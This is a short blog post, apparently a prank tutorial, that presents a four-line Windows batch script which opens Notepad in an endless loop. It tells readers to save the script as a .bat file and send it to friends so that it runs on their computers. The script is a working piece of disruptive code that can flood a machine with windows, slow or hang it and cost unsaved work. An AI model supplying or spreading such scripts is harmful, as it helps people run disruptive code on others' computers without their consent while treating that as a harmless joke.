Hi friends, Do you want fake your friends computer with a simple funny virus. this virus will opens the notepad continuesly in your friends computer. this is so funny try this.first open the notepad. and type this source code in notepad. save the source code with ".bat" extension. the .bat extension will save the source code in batch file. send this file to your friends.
source code:
@echo off
:top
start %SystemRoot%\system32\notepad.exe
GOTO top
0 comments:
Post a Comment